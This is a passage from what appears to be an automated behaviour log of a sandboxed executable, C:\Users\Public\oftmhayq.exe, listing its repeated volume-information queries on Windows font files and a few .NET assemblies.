          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Users\Public\oftmhayq.exe VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
